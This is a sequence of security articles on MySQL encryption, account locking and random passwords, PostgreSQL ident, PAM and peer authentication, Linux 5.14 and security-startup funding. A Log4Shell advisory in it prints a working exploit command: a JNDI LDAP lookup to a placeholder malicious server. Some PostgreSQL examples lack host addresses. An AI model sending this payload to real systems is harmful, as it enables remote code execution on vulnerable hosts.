Percona Server for MySQL Encryption Options and Choices

Security will always be a main focal point for a company’s data. A common question I get from clients is, “how do I enable encryption?” Like every good consulting answer, it depends on what you are trying to encrypt. This post is a high-level summary of the different options available for encryption in Percona Server for MySQL.

Different certifications require different levels of encryption. For example, PCI requires encryption of both data at rest and data in transit. Here are the main facets of encryption for MySQL:

  • Data at Rest
    • Full disk encryption (at the OS level)
    • Transparent Data Encryption – TDE
    • Column/field-level encryption
  • Data in Transit
    • TLS Connections

Data at Rest

Data at rest is the most frequently asked-about aspect of encryption. It has multiple components, but at its core it simply means ensuring that the data is encrypted at some level when stored. Here are the primary ways to look at the encryption of data at rest.

Full Disk Encryption (FDE)

This is the easiest and most portable method of encrypting data at rest. When using full disk encryption, the main goal is to protect the hard drives in the event they are compromised. If a disk is removed from the server or the server is removed from a rack, the disk isn’t readable without the encryption key.

This can be managed in different ways, but the infrastructure team generally handles it. Frequently, enterprises already have disk encryption as part of the infrastructure stack. This makes FDE a relatively easy option for data at rest encryption. It also has the advantage of being portable. Regardless of which database technology you use, the encryption is managed at the server level.

The main disadvantage of FDE is that once the server is running and the disk is mounted, all data is readable. It offers no protection against an attack on a live system.

Transparent Data Encryption (TDE)

Moving up the chain, the next option for data at rest encryption is Transparent Data Encryption (TDE). In contrast to FDE, this method encrypts the actual InnoDB data and log files. The main difference with database TDE is that encryption is managed through the database, not at the server level. With this approach, the data and log files are encrypted on disk by the database. As queries read data, the encrypted pages are fetched from disk and decrypted to be loaded into InnoDB’s buffer pool for execution.

For this method, the encryption keys are managed either through local files or a remote KMS (such as HashiCorp Vault) via a keyring plugin. While this approach helps prevent any OS user from simply copying data files, the decrypted data does reside in memory, which could be susceptible to a clever hacker; we must rely on OS-level memory protections for further assurance. It also shifts the complexity of key management and backups onto the DBA team.
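Assuming a keyring plugin (for example, keyring_file) has already been loaded at server startup, a minimal sketch of enabling TDE for InnoDB tables could look like this (table names are illustrative):

```sql
-- Requires a keyring plugin loaded at startup, e.g. in my.cnf:
--   [mysqld]
--   early-plugin-load = keyring_file.so

-- Create a table whose tablespace is encrypted on disk:
CREATE TABLE customers (
  id   INT PRIMARY KEY,
  name VARCHAR(100)
) ENCRYPTION = 'Y';

-- Encrypt an existing table in place:
ALTER TABLE orders ENCRYPTION = 'Y';
```

From this point on, the pages of these tablespaces are written to disk encrypted, while queries continue to work unchanged.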

Column Level Encryption

While the prior methods of at-rest encryption can help meet various compliance requirements, both are limited when it comes to a running system: in either case, if a running system is compromised, the stored data is fully readable. Column-level encryption protects data even on a running system; without the key, the data in the encrypted column is unreadable.

While this method protects selected data in a running system, it often requires application-level changes. Inserts are done with a specific encryption function (AES_ENCRYPT in MySQL, for example). To read the data, AES_DECRYPT with the specified key is required. The main risk with this approach is sending the plaintext values as part of the query. This can be sniffed if not using TLS or potentially leaked through log files. The better approach is to encrypt the data in the application BEFORE sending it to MySQL to ensure no plaintext is ever passed between systems.

In some cases, you can use a shared key for the entire application. Other approaches would be to use an envelope method and store a unique key alongside each encrypted value (protected by a separate master key).

Either way, it is important to understand one of the primary downsides to this approach: indexes and sort order can and will be impacted. For example, if you encrypt a Social Security number, you won’t be able to sort by SSN within MySQL. You can still look up a row by SSN, but you must pass the encrypted value in the query.
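A minimal sketch of this pattern using MySQL’s built-in functions follows; the schema, key, and values are purely illustrative, and a real deployment would keep the key out of the SQL text (ideally encrypting in the application, as noted above):

```sql
-- Store the encrypted value in a VARBINARY column:
CREATE TABLE employees (
  id  INT PRIMARY KEY,
  ssn VARBINARY(255)
);

INSERT INTO employees (id, ssn)
VALUES (1, AES_ENCRYPT('123-45-6789', 'secret_key'));

-- Reading the plaintext requires the key:
SELECT AES_DECRYPT(ssn, 'secret_key') FROM employees WHERE id = 1;

-- Equality lookup works by comparing encrypted values,
-- but ORDER BY ssn no longer sorts by the plaintext:
SELECT id FROM employees
WHERE ssn = AES_ENCRYPT('123-45-6789', 'secret_key');
```

Note that the equality lookup only works when encryption is deterministic for a given key, which is why randomized schemes trade lookup ability for stronger protection.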

Data in Transit

Now that we’ve discussed the different types of data-at-rest encryption, it is important to also encrypt traffic to and from the database. Connecting to the server via TLS ensures that any sensitive data sent to or from the server is encrypted. This can prevent data from leaking over the wire or via man-in-the-middle attacks.

This is a straightforward way to secure communication, and when combined with some at-rest encryption, serves to check a few more boxes towards various compliances.
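As a sketch, TLS can be required either server-wide or per account (the account name here is illustrative):

```sql
-- Reject all non-TLS TCP connections server-wide:
SET GLOBAL require_secure_transport = ON;

-- Or require TLS for a single account:
ALTER USER 'app'@'%' REQUIRE SSL;

-- From a client session, verify that the connection is encrypted
-- (a non-empty value means TLS is in use):
SHOW SESSION STATUS LIKE 'Ssl_cipher';
```

The per-account REQUIRE SSL option is useful for rolling TLS out gradually before enforcing it globally.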


Overall, there are several aspects of encryption in MySQL. This makes it possible to meet many common compliance requirements for different types of regulations. Security is a critical piece of the database tier, and these discussions are needed across teams in an organization. Ensuring that security, infrastructure, and the database team are on the same page is essential, especially during the design phase. Let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!

Percona Distribution for MySQL is the most complete, stable, scalable, and secure open-source MySQL solution available, delivering enterprise-grade database environments for your most critical business applications… and it’s free to use!

Download Percona Distribution for MySQL Today


Log4JShell Vulnerability Update

Percona Security has been tracking an evolving issue over the weekend and into the beginning of this week.

The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The simplest example is:

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

When executed, this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing, which seek either to exploit the issue or at least confirm its presence.

Is any Percona Software or Service Affected by this Vulnerability?

At the time of writing, no Percona software is known to be affected by the CVE-2021-44228 log4j vulnerability, as Percona does not use Java in any of the open source software it produces.

We are of course working with our service vendors and third parties to ensure they too are not affected by this issue and are tracking their response internally via JIRA ticket at the time of writing. Percona is not aware of any of our service providers impacted by the log4j vulnerability at the time of writing.

Where possible, we are employing methods to increase visibility and protection against this issue, applying additional layers of defense even though the underlying software is not affected.

We have validated that the software we are using in our build pipelines is not affected by this issue at the time of writing.

Please refer to the details on https://www.percona.com/security regarding the appropriate channels of contact, should you wish to raise a direct contact request regarding this or another issue.

UPDATE 2021-12-15:

The fix implemented in log4j 2.15 has been reported as an “incomplete” fix; the new CVE tracking this issue is CVE-2021-45046, so log4j currently requires updating to >= 2.16 to fully protect against these issues. While this latest issue is reported as moderate (not high) severity, likely due to the complexity of the exploitation vector, our advice at this time is to update to address it as well.

Percona continues to track this major issue and take appropriate action to safeguard our clients and users.

We are working on enhancing defences, active scanning, and reporting for indicators of the log4j issues. Although we have not been directly affected at this point in time, we are taking appropriate measures to safeguard against this in the future.

Our teams are working diligently on this issue, and we expect to publish further updates as this issue continues to unfold and further detail becomes available through our testing and through the publication of information.

David Busby
Information Security Architect


MySQL 8: Random Password Generator

As part of my ongoing focus on MySQL 8 user and password management, I’ve covered how using the new dual passwords feature can reduce the overall DBA workload and streamline the management process. I’ve also covered how the new password failure tracking features can enable the locking of an account with too many failed password attempts (see MySQL 8: Account Locking).

Other new and useful features have been added to the user management capabilities in MySQL 8 as well, and an often overlooked change is the implementation of a random password generator. First introduced in MySQL 8.0.18, this feature gives the CREATE USER, ALTER USER, and SET PASSWORD statements the capability of generating random passwords for user accounts as an alternative to explicit administrator-specified passwords.

Usage of MySQL 8 Random Password Generator

By default, all MySQL-generated random user/account passwords have a length of 20 characters. This can be changed, however, using the ‘generated_random_password_length’ system variable. With a valid range of 5 to 255, this dynamic variable can be set at the global or session level and determines the length of the randomly generated password.

mysql> SHOW variables LIKE 'generated_random_password_length';
| Variable_name                    | Value |
| generated_random_password_length | 20    |
1 row in set (0.01 sec)
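Since the variable is dynamic, it can be adjusted without a restart. For example, to generate a longer password for just the current session (the account name is illustrative):

```sql
-- Applies only to this session; other sessions keep the global default:
SET SESSION generated_random_password_length = 30;

CREATE USER 'demo'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
```

The result set for the CREATE USER statement would then contain a 30-character generated password.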

Once a random password has been generated for a given user account, the statement stores the password in the ‘mysql.user’ system table, hashed appropriately for the authentication plugin. The cleartext ‘generated password’ is returned in the result set along with the ‘user’ and ‘host’ so that information is available to the user or application. See the examples below:

mysql> CREATE USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
| user    | host      | generated password   |
| percona | localhost | k%RJ51/kA>,B(74;DBq2 |
1 row in set (0.02 sec)

mysql> ALTER USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
| user    | host      | generated password   |
| percona | localhost | eX!EOssQ,(Hn4dOdw6Om |
1 row in set (0.01 sec)

mysql> SET PASSWORD FOR 'percona'@'localhost' TO RANDOM;
| user    | host      | generated password   |
| percona | localhost | 5ohXP2LBTTPzJ+7oEDL4 |
1 row in set (0.00 sec)


The generated password is written to the binary log only in hashed form, so the plaintext is never available anywhere other than the initial result set from the user statement (as above). The authentication plugin is also named in the binlog alongside the hashed password value. Below are a couple of examples extracted from the MySQL binlog for the ‘percona’@’localhost’ user that we created and altered earlier:

CREATE USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*5978ACEA46C1B81C7BEE2D1470ED1B002FE6840B'
ALTER USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*2994ECB14E21A8333C8C2DEDF38311EB714D500C'

In Closing

Human imagination is often a limiting factor in choosing secure passwords. The random password capability introduced in MySQL 8.0.18 ensures that there is a standardized method for truly random and secure passwords in your database environment.

Complete the 2021 Percona Open Source Data Management Software Survey

Have Your Say!


MySQL 8: Account Locking

As part of my ongoing focus on MySQL 8 user and password management, I’ve covered how the new dual passwords feature can reduce the overall DBA workload and streamline the management process (see MySQL 8: Dual Passwords). This wasn’t the only change to user/password management in MySQL 8; one of the more security-focused changes was the implementation of temporary account locking, first introduced in MySQL 8.0.19. With this feature, database administrators can now configure user accounts so that too many consecutive login failures temporarily lock the account.

The account locking feature only applies to the failure of a client to provide a correct password during the connection attempt. It does not apply to failure to connect for other reasons (network issues, unknown user account, etc.). In the case of dual passwords, either of the account passwords that have been set would count as correct during successful authentication.

Usage of MySQL 8 Account Locking

Configurable options are FAILED_LOGIN_ATTEMPTS and PASSWORD_LOCK_TIME, both used with the CREATE USER and ALTER USER statements. A couple of usage examples are:
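For instance, with illustrative account names and values:

```sql
-- Lock the account for 2 days after 3 consecutive failed logins:
CREATE USER 'percona'@'localhost' IDENTIFIED BY 'S3cret!'
  FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 2;

-- Lock until manually unlocked after 4 consecutive failures:
ALTER USER 'percona'@'localhost'
  FAILED_LOGIN_ATTEMPTS 4 PASSWORD_LOCK_TIME UNBOUNDED;
```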


Once a user has been set up with these options, too many consecutive login failures will result in an error:

ERROR 3957 (HY000) : Access denied for user percona.
Account is blocked for D day(s) (R day(s) remaining) due to N consecutive failed logins. 


FAILED_LOGIN_ATTEMPTS N

This option determines whether or not to track account login attempts with an incorrect password. The number N specifies how many consecutive wrong password attempts will lock the account.


PASSWORD_LOCK_TIME {N | UNBOUNDED}

This option indicates how long an account remains locked after too many consecutive incorrect password attempts. The number N specifies the number of days the account remains locked. For a more permanent lockout, setting this to UNBOUNDED stipulates that the duration of the locked state is unbounded and does not end until the account is manually unlocked.

  • For both options, permitted values for N are between 0 and 32,767; setting the value to 0 disables the option. 
  • Note that for failed login tracking and locking to occur for an account, both of the above options must be set to a non-zero value. 
  • When creating a new user without specifying either of the above options, the implicit default value is 0 for any accounts named in the statement. 
    • In other words, failed login tracking and temporary account locking are disabled when these options are not specified. 
    • This also applies to any accounts created before the introduction of this feature. 
  • When altering a user without specifying either of the above options, the existing values remain unchanged for all accounts named by the statement. 
  • For temporary account locking to occur, the password failures must be consecutive. 
    • Any successful login before reaching the FAILED_LOGIN_ATTEMPTS value for that user will reset the failure counting. 
  • Once an account has been temporarily locked, it is impossible to log in even with the correct password until either the lock duration has passed or the account is unlocked by one of the account reset methods below. 

Resetting Account Locks

The server maintains state information for each account regarding failed-login tracking and lock status, refreshed each time it reads the grant tables. An account’s state information can be reset, clearing the failed-login count and unlocking the account if it is already locked. Account resets can be global for all accounts or limited to a single account. 

Global Reset

  • A global reset of all accounts occurs for any of the following conditions:
    • MySQL server restart.
    • Execution of FLUSH PRIVILEGES.

Single Account Reset

  • A per-account reset occurs for any of the following conditions:
    • Successful login for the account.
    • Expiration of the lock duration.
      • Failed login counting resets and resumes at the time of the next login attempt.
    • Execution of an ALTER USER statement for the account that sets either of the above options (or both) to any value, or the execution of an ALTER USER … UNLOCK statement for the account.
      • No other ALTER USER statements have any effect on the failed-login counter or the account lock state.
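A manual unlock of this kind can be sketched as follows (the account name is illustrative):

```sql
-- Reset the failed-login counter and unlock the account immediately:
ALTER USER 'percona'@'localhost' ACCOUNT UNLOCK;

-- Setting either tracking option also resets the state:
ALTER USER 'percona'@'localhost' FAILED_LOGIN_ATTEMPTS 3;
```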

Account Locking Behavior

The account locking state is recorded in the ‘account_locked’ column of the mysql.user system table. The output from SHOW CREATE USER indicates whether an account is locked or unlocked.

If a client attempts to connect to a locked account, the attempt fails. The server increments the ‘Locked_connects’ status variable, which counts attempts to connect to locked accounts; an error message is displayed, and the attempt is logged to the MySQL error log:

Access denied for user ‘percona’@’localhost’.
Account is locked.

Locking an account does not affect connecting using a proxy user that assumes the identity of the locked account. It also does not affect the ability to execute stored procedures or views with the DEFINER attribute set to the locked account.

In Closing

While this is another relatively simple feature, it can significantly impact how your company manages the security aspects of failed login attempts. This leads to a more secure database environment and better client management overall. Having this ability has also proven helpful during maintenance operations to disable access from specific accounts or as a security measure to lock privileged accounts and unlock them only during application maintenance.

Not running MySQL 8 yet? A colleague pointed out that a similar functionality was available in earlier versions of MySQL by utilizing the Connection-Control Plugin. With this plugin, too many consecutive failed attempts would increase the delay in the server response to help avoid or minimize brute force attacks. If there is interest, I may cover this plugin in more detail in a future blog post. Let me know!



TrueFort snares $30M Series B to expand zero trust application security solution

As companies try to navigate an ever-changing security landscape, it can be challenging to protect everything. Security startup TrueFort has built a zero trust solution focusing on protecting enterprise applications. Today, the company announced a $30 million Series B.

Shasta Ventures led today’s round with participation from new firms Canaan and Ericsson Ventures along with existing investors Evolution Equity Partners, Lytical Ventures and Emerald Development Managers. Under the terms of the agreement Nitin Chopra, managing director at Shasta Ventures, will be joining the company board. Today’s investment brings the total raised to almost $48 million.

CEO and co-founder Sameer Malhotra says that TrueFort protects customers by analyzing each application and figuring out what normal behavior looks like. Once it understands that, it will flag anything that falls outside of the norm. The company achieves this by gathering data from partners like CrowdStrike and from multiple points within the application and infrastructure.

“Once we get this telemetry, whether it’s networks, endpoints, servers or third-party partners, we then help the customer build a picture of what those applications are doing and what’s normal behavior. We then help them baseline that, and monitor that in real time with response and real-time controls to continue those applications through their normal life cycle,” he said.

Zero trust is a concept where, as a matter of policy, you assume you cannot trust any individual or device until the entity proves it belongs on your systems. Malhotra says that customers are becoming more comfortable with the concept: in 2020 the company saw massive 650% year-over-year revenue growth, and it is up 120% year over year so far this year.

“We are seeing the demand, especially as zero trust is becoming a more familiar vernacular amongst the security community […]. Again, it’s having the visibility and understanding, and then being able to then reduce it to the limited number of acceptable relationships or executions,” he said. And he believes that it all comes down to understanding your applications and how they operate.

TrueFort co-founders Nazario Parsacala and Sameer Malhotra

TrueFort co-founders Nazario Parsacala and Sameer Malhotra. Image Credits: TrueFort

The company currently has 60 employees, with hopes of reaching 85 or 90 by the end of the year. Malhotra says that as they build the employee base, they are driving to make it diverse at every level.

“We look at diversity across our whole management team, all the way from the board down to our different levels. We are quite aggressive in hiring diverse candidates, whether they’re women or LGBTQ or people of color. And we have focused programs where we work with different universities […] to bring on new employees from a diverse talent pool. We also work with different recruiters from that perspective, and our focus is always to look at a different palette and to make sure that we’re as diverse an organization as we can,” he said.

The company was founded in 2015 by Malhotra and his partner Nazario Parsacala, both of whom spent more than 20 years working at big financial services companies — Goldman Sachs and JP Morgan. They worked for a couple of years building the program, launching the first beta in 2017 before bringing the first generally available product to market the following year.

Currently customers can install the solution on prem or in the cloud of their choice, but the company has a SaaS solution in the works as well, that will be ready in the next couple of months.


Linux 5.14 set to boost future enterprise application security

Linux is set for a big release this Sunday August 29, setting the stage for enterprise and cloud applications for months to come. The 5.14 kernel update will include security and performance improvements.

A particular area of interest for both enterprise and cloud users is always security and to that end, Linux 5.14 will help with several new capabilities. Mike McGrath, vice president, Linux Engineering at Red Hat told TechCrunch that the kernel update includes a feature known as core scheduling, which is intended to help mitigate processor-level vulnerabilities like Spectre and Meltdown, which first surfaced in 2018. One of the ways that Linux users have had to mitigate those vulnerabilities is by disabling hyper-threading on CPUs and therefore taking a performance hit. 

“More specifically, the feature helps to split trusted and untrusted tasks so that they don’t share a core, limiting the overall threat surface while keeping cloud-scale performance relatively unchanged,” McGrath explained.

Another area of security innovation in Linux 5.14 is a feature that has been in development for over a year and a half and that will help to protect system memory better than before. Attacks against Linux and other operating systems often target memory as a primary attack surface to exploit. With the new kernel, there is a capability known as memfd_secret() that enables an application running on a Linux system to create a memory range that is inaccessible to anyone else, including the kernel.

“This means cryptographic keys, sensitive data and other secrets can be stored there to limit exposure to other users or system activities,” McGrath said.

At the heart of the open source Linux operating system that powers much of the cloud and enterprise application delivery is what is known as the Linux kernel. The kernel is the component that provides the core functionality for system operations. 

The Linux 5.14 kernel release has gone through seven release candidates over the last two months and benefits from the contributions of 1,650 different developers. Those that contribute to Linux kernel development include individual contributors, as well as large vendors like Intel, AMD, IBM, Oracle and Samsung. One of the largest contributors to any given Linux kernel release is IBM’s Red Hat business unit. IBM acquired Red Hat for $34 billion in a deal that closed in 2019.

“As with pretty much every kernel release, we see some very innovative capabilities in 5.14,” McGrath said.

While Linux 5.14 will be out soon, it often takes time until it is adopted inside of enterprise releases. McGrath said that Linux 5.14 will first appear in Red Hat’s Fedora community Linux distribution and will be a part of the future Red Hat Enterprise Linux 9 release. Gerald Pfeifer, CTO for enterprise Linux vendor SUSE, told TechCrunch that his company’s openSUSE Tumbleweed community release will likely include the Linux 5.14 kernel within ‘days’ of the official release. On the enterprise side, he noted that SUSE Linux Enterprise 15 SP4, due next spring, is scheduled to come with Kernel 5.14. 

The new Linux update follows a major milestone for the open source operating system, as it was 30 years ago this past Wednesday that creator Linus Torvalds (pictured above) first publicly announced the effort. Over that time Linux has gone from being a hobbyist effort to powering the infrastructure of the internet.

McGrath commented that Linux is already the backbone for the modern cloud and Red Hat is also excited about how Linux will be the backbone for edge computing – not just within telecommunications, but broadly across all industries, from manufacturing and healthcare to entertainment and service providers, in the years to come.

The longevity and continued importance of Linux for the next 30 years is assured in Pfeifer’s view.  He noted that over the decades Linux and open source have opened up unprecedented potential for innovation, coupled with openness and independence.

“Will Linux, the kernel, still be the leader in 30 years? I don’t know. Will it be relevant? Absolutely,” he said. “Many of the approaches we have created and developed will still be pillars of technological progress 30 years from now. Of that I am certain.”




PostgreSQL Database Security: OS – Authentication

Security is everybody’s concern when talking about data and information, and it is therefore the main foundation of every database. Security means protecting your data from unauthorized access: only authorized users can log in to a system (authentication); a user can only do what they are authorized to do (authorization); and user activity is logged (accounting). I have explained these in my main security post, PostgreSQL Database Security: What You Need To Know.

When we are talking about security, authentication is the first line of defense. PostgreSQL provides various methods of authentication, which fall into three categories.

In most cases, PostgreSQL is configured to use internal authentication, so I discussed the internal authentication methods in the previous blog post mentioned above. In this post, we will discuss the three operating system-based authentication methods for PostgreSQL: ident, PAM, and peer.


Ident

Ident authentication only supports TCP/IP connections. An ident server provides a mechanism to map the client’s operating system username onto the database username. It also has the option for username mapping.

# TYPE  DATABASE        USER            ADDRESS                 METHOD
# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all               ident
# IPv6 local connections:
host    all             all             ::1/128                 trust
# Allow replication connections from localhost, by a user with the

$ psql postgres -h -U postgres
psql: error: connection to server at "", port 5432 failed: FATAL:  Ident authentication failed for user "postgres"

If no ident server is installed, you will need to install ident2 on your Ubuntu box or oidentd on CentOS 7. Once you have installed and configured the ident server, it is time to configure PostgreSQL, starting with creating a user map in the “pg_ident.conf” file.

# Put your actual configuration here
# ----------------------------------
PG_USER         vagrant                 postgres

Here we have mapped the operating system user “vagrant” to PostgreSQL’s “postgres” user. Time to log in as vagrant.

$ psql postgres -h -U postgres
psql (15devel)
Type "help" for help.


Note: The Identification Protocol is not intended as an authorization or access control protocol.

PAM (Pluggable Authentication Modules)

PAM (Pluggable Authentication Modules) authentication works similarly to the “password” method. You have to create a PAM service file that enables PAM-based authentication; the service name should match the file you create (“postgresql” in this post).

Once the service is created, PAM can now validate user name/password pairs and optionally the connected remote hostname or IP address. The user must already exist in the database for PAM authentication to work.

$ psql postgres -h -U postgres
Password for user postgres: 
2021-08-11 13:16:38.332 UTC [13828] LOG:  pam_authenticate failed: Authentication failure
2021-08-11 13:16:38.332 UTC [13828] FATAL:  PAM authentication failed for user "postgres"
2021-08-11 13:16:38.332 UTC [13828] DETAIL:  Connection matched pg_hba.conf line 91: "host    all             all               pam"
psql: error: connection to server at "", port 5432 failed: FATAL:  PAM authentication failed for user "postgres"

Ensure that the PostgreSQL server supports PAM authentication. It is a compile-time option that must be set when the server binaries were built. You can check if your PostgreSQL server supports PAM authentication using the following command.

$ pg_config | grep with-pam

CONFIGURE =  '--enable-tap-tests' '--enable-cassert' '--prefix=/usr/local/pgsql/' '--with-pam'

In case there is no PAM server file for PostgreSQL under /etc/pam.d, you’d have to create it manually. You may choose any name for the file; however, I prefer to name it “postgresql.”

$ cat /etc/pam.d/postgresql

@include common-auth
@include common-account
@include common-session
@include common-password

Since the PostgreSQL user cannot read the password files, install sssd (SSSD – System Security Services Daemon) to bypass this limitation.

sudo apt-get install sssd

Add postgresql to the “ad_gpo_map_remote_interactive” option in “/etc/sssd/sssd.conf”:

$ cat /etc/sssd/sssd.conf
ad_gpo_map_remote_interactive = +postgresql

Start the sssd service and check its status to confirm it started properly.

$ sudo systemctl start sssd

$ sudo systemctl status sssd
sssd.service - System Security Services Daemon
     Loaded: loaded (/lib/systemd/system/sssd.service; enabled; vendor preset: enabled)
     Active: active (running) since Wed 2021-08-11 16:18:41 UTC; 12min ago
   Main PID: 1393 (sssd)
      Tasks: 2 (limit: 1071)
     Memory: 5.7M
     CGroup: /system.slice/sssd.service
             ├─1393 /usr/sbin/sssd -i --logger=files
             └─1394 /usr/libexec/sssd/sssd_be --domain shadowutils --uid 0 --gid 0 --logger=files

Time now to configure pg_hba.conf to use PAM authentication. We need to specify the PAM service name (pamservice) as part of the authentication options. This should match the file created in the /etc/pam.d folder, which in my case is postgresql.

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            pam pamservice=postgresql
# IPv6 local connections:
host    all             all             ::1/128                 trust

# Allow replication connections from localhost, by a user with the

We must now reload (or restart) the PostgreSQL server. After this, you can try to login into the PostgreSQL server.

vagrant@ubuntu-focal:~$ psql postgres -h localhost -U postgres
psql (15devel)
Type "help" for help.


If PAM is set up to read /etc/shadow, authentication will fail because the PostgreSQL server is started by a non-root user. However, this is not an issue when PAM is configured to use LDAP or other authentication methods.
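The underlying reason is ordinary file permissions: on most Linux systems, /etc/shadow is readable only by root (and the shadow group). A short Python sketch of the check a non-root server process would fail (`can_read` is an illustrative helper, not anything PostgreSQL provides):

```python
import os

# Illustrative helper: can the current process read a given file?
# A PostgreSQL server running as the unprivileged "postgres" user gets
# False for /etc/shadow (typically mode 0640, owned by root:shadow),
# which is why PAM authentication against local shadow passwords fails
# without a helper such as SSSD.
def can_read(path):
    return os.access(path, os.R_OK)

# /etc/passwd is world-readable, so this is normally True for any user;
# the same call on /etc/shadow returns False for non-root users.
print(can_read("/etc/passwd"))
```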


Peer authentication is “ident”ical, i.e., very much like ident authentication! The only subtle differences are that there is no ident server and that this method works on local connections rather than over TCP/IP.

Peer authentication provides a mechanism to map the client’s operating system username onto a database username. It also supports username mapping. The configuration is very similar to the ident authentication setup, except that the authentication method is specified as “peer” instead of “ident.”
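To make the usermap semantics concrete, here is a simplified Python sketch of how a pg_ident-style map resolves a login. `resolve_usermap` is an illustrative name, not a PostgreSQL API, and the sketch ignores the real file’s `/regex` and `\1` substitution features:

```python
# Illustrative sketch of pg_ident.conf usermap resolution: each line holds
# MAPNAME  SYSTEM-USERNAME  PG-USERNAME. A login is allowed when a line in
# the requested map pairs the OS user with the requested database user.
# (The real file also supports /regex system names; omitted here.)
def resolve_usermap(ident_conf, map_name, system_user, db_user):
    for line in ident_conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines are ignored
        fields = line.split()
        if len(fields) != 3:
            continue  # malformed line; the real parser reports an error
        name, sys_u, pg_u = fields
        if (name, sys_u, pg_u) == (map_name, system_user, db_user):
            return True
    return False

IDENT_CONF = """
# MAPNAME       SYSTEM-USERNAME         PG-USERNAME
PG_USER         vagrant                 postgres
"""

print(resolve_usermap(IDENT_CONF, "PG_USER", "vagrant", "postgres"))  # True
print(resolve_usermap(IDENT_CONF, "PG_USER", "mallory", "postgres"))  # False
```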

$ cat $PGDATA/pg_hba.conf

# TYPE  DATABASE        USER            ADDRESS                 METHOD

# "local" is for Unix domain socket connections only
local   all             all                                   peer map=PG_USER
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust

$ psql postgres -U postgres

2021-08-12 10:51:11.855 UTC [1976] LOG:  no match in usermap "PG_USER" for user "postgres" authenticated as "vagrant"

2021-08-12 10:51:11.855 UTC [1976] FATAL:  Peer authentication failed for user "postgres"

2021-08-12 10:51:11.855 UTC [1976] DETAIL:  Connection matched pg_hba.conf line 89: "local   all             all                                     peer map=PG_USER"

psql: error: connection to server on socket "/tmp/.s.PGSQL.5432" failed: FATAL:  Peer authentication failed for user "postgres"

The authentication fails because the usermap “PG_USER” is not yet defined. The mapping between operating system users and database users lives in $PGDATA/pg_ident.conf, which will look something like this:

$ cat $PGDATA/pg_ident.conf
# MAPNAME       SYSTEM-USERNAME         PG-USERNAME
PG_USER         vagrant                 postgres

vagrant@ubuntu-focal:~$ psql postgres -U postgres
psql (15devel)
Type "help" for help.


We’ve covered several different authentication methods in this blog. These basic methods involve only the PostgreSQL server, the kernel, and the ident server; the options are available natively, without any major external dependencies. It is, however, important that the database is secured properly to prevent unauthorized access to the data.

Percona Distribution for PostgreSQL provides the best and most critical enterprise components from the open-source community in a single distribution, designed and tested to work together.

Download Percona Distribution for PostgreSQL Today!


ActiveFence comes out of the shadows with $100M in funding and tech that detects online harm, now valued at $500M+

Online abuse, disinformation, fraud and other malicious content is growing and getting more complex to track. Today, a startup called ActiveFence is coming out of the shadows to announce significant funding on the back of a surge of large organizations using its services. ActiveFence has quietly built a tech platform to suss out threats as they are being formed and planned to make it easier for trust and safety teams to combat them on platforms.

The startup, co-headquartered in New York and Tel Aviv, has raised $100 million, funding that it will use to continue developing its tools and to continue expanding its customer base. To date, ActiveFence says that its customers include companies in social media, audio and video streaming, file sharing, gaming, marketplaces and other technologies — it has yet to disclose any specific names but says that its tools collectively cover “billions” of users. Governments and brands are two other categories that it is targeting as it continues to expand. It has been around since 2018 and is growing at around 100% annually.

The $100 million being announced today actually covers two rounds: Its most recent Series B led by CRV and Highland Europe, as well as a Series A it never announced led by Grove Ventures and Norwest Venture Partners. Vintage Investment Partners, Resolute Ventures and other unnamed backers also participated. It’s not disclosing valuation but I understand it’s over $500 million.

“We are very honored to be ActiveFence partners from the very earliest days of the company, and to be part of this important journey to make the internet a safer place and see their unprecedented success with the world’s leading internet platforms,” said Lotan Levkowitz, general partner at Grove Ventures, in a statement.

The increased presence of social media and online chatter on other platforms has put a strong spotlight on how those forums are used by bad actors to spread malicious content. ActiveFence’s particular approach is a set of algorithms that tap into innovations in AI (natural language processing) and to map relationships between conversations. It crawls all of the obvious, and less obvious and harder-to-reach parts of the internet to pick up on chatter that is typically where a lot of the malicious content and campaigns are born — some 3 million sources in all — before they become higher-profile issues. It’s built both on the concept of big data analytics as well as understanding that the long tail of content online has a value if it can be tapped effectively.

“We take a fundamentally different approach to trust, safety and content moderation,” Noam Schwartz, the co-founder and CEO, said in an interview. “We are proactively searching the darkest corners of the web and looking for bad actors in order to understand the sources of malicious content. Our customers then know what’s coming. They don’t need to wait for the damage, or for internal research teams to identify the next scam or disinformation campaign. We work with some of the most important companies in the world, but even tiny, super niche platforms have risks.”

The insights that ActiveFence gathers are then packaged up in an API that its customers can then feed into whatever other systems they use to track or mitigate traffic on their own platforms.

ActiveFence is not the only company building technology to help platform operators, governments and brands have a better picture of what is going on in the wider online world. Factmata has built algorithms to better understand and track sentiments online; Primer (which also recently raised a big round) also uses NLP to help its customers track online information, with its customers including government organizations that used its technology to track misinformation during election campaigns; Bolster (formerly called RedMarlin) is another.

Some of the bigger platforms have also gotten more proactive in bringing tracking technology and talent in-house: Facebook acquired Bloomsbury AI several years ago for this purpose; Twitter has acquired Fabula (and is working on a bigger efforts like Birdwatch to build better tools), and earlier this year Discord picked up Sentropy, another online abuse tracker. In some cases, companies that more regularly compete against each other for eyeballs and dollars are even teaming up to collaborate on efforts.

Indeed, it may well be that ultimately there will exist multiple efforts and multiple companies doing good work in this area, not unlike other corners of the world of security, which might need more than one hammer thrown at problems to crack them. In this particular case, the growth of the startup to date, and its effectiveness in identifying early warning signs, is one reason investors have been interested in ActiveFence.

